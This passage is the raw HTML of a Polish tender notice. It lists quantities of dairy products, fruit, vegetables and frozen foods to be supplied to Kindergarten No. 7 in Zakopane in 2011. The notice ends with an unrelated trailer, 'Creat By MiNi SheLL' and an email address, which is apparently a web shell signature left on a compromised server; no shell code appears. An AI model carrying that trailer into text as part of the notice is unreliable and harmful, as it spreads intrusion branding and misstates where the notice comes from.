20.	Filet z kury	Kg	130.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa produktów mleczarskich na potrzeby Przedszkola nr 7 w Zakopanem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa produktów mleczarskich na potrzeby Przedszkola nr 7 w Zakopanem 
Zakres zamówienia obejmuje; 
1.	Śmietana 30 % 1l karton	szt.	40
2.	Mleko świeże ( butelka)3,2%	szt.	4320
3.	Masło ekstra 82% tłuszcz  200g	szt.	1360
4.	Twaróg półtłusty 1kg	kg	310
5.	Serek hom 135g typ Darek lub równoważny 
Miksy owocowe	szt.	720
6.	Ser żółty ( edamski) lub równoważny 	kg	77
7.	Jogurt Jogobella 150g lub równoważny 	szt.	1640
8.	Śmietana 380g 18 %	szt	990
  9.	Serek topiony100g  kremowy	szt	 260
10.	Margaryna Palma250 g lub równoważna 	szt 	 600
11.	Kefir 350g 2% 	szt	 288
12.	Jogurty pitne  typ(Darek) 125g lub równoważny	szt	270.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawa owoców i warzyw na potrzeby Przedszkola Nr 7 w Zakopanem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa owoców i warzyw na potrzeby Przedszkola Nr 7 w Zakopanem .
Zakres zamówienia obejmuje; 
1.	Banany	kg	400
2.	Buraki ćwikłowe	kg	330
3.	Cebula	kg	305
4.	Cytryny	kg	15
5.	Fasola Jaś	kg	13
6.	Groch łuszczony połówki	kg	30
7.	Gruszki	kg	170
8.	Jabłka deserowe	kg	1020
9.	Jaja kurze klasa XL	szt.	6300
10.	Kalafior	szt	146
11.	Kapusta biała	kg	135
12.	Kapusta czerwona	szt	30
13.	Kapusta kwaszona	kg	300
14.	Mandarynki	kg	45
15.	Marchew	kg	1300
16.	Ogórek kiszony	kg	300
17.	Ogórek świeży	kg	97
18.	Papryka świeża	kg	30
19.	Pieczarki	kg	75
20.	Pietruszka	kg	228
21.	Pomidor	kg	65
22.	Rzodkiewka	szt.	60
23.	Sałata zielona	szt.	140
24.	Seler	kg	260
25.	Szczypior	pęcz	295
26.	Śliwki	kg	30
27.	Ziemniaki	kg	9700
28.	Pietruszka natka 25g	szt.	570
29.	Por	kg	570
30.	Koperek 25g	pęcz	550
31.	Kapusta pekińska 	szt	70
32.	Kapusta włoska	  szt.	  99
33.	Brokuły	  szt.	 20
34.	Botwinka	  szt.	 10
35.	Winogrona	  kg	 70
36.	Kiwi	  szt	 590
37.	Brzoskwinia	  kg	 80
38.	Pomarańcza	  kg	190.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.22.00.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Dostawa mrożonek na potrzeby Przedszkola nr 7 w Zakopanem.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest sukcesywna dostawa mrozonek na potrzeby Ptrzedszkola nr 7 w Zakopanem
Zakres zamówienia obejmuje: 
1.	Ryba Filet 
Panga
Tilapia
dorsz	kg	
 120
 100
   70
2.	Kalafior 2,50 kg	kg	46
3.	Truskawki mrożone 450 g	kg	300
4.	Mieszanka kompotowa 2,50 kg	kg	150
5.	Brukselka 2,50 kg	kg	22.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.22.10.00-3, 15.33.11.70-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com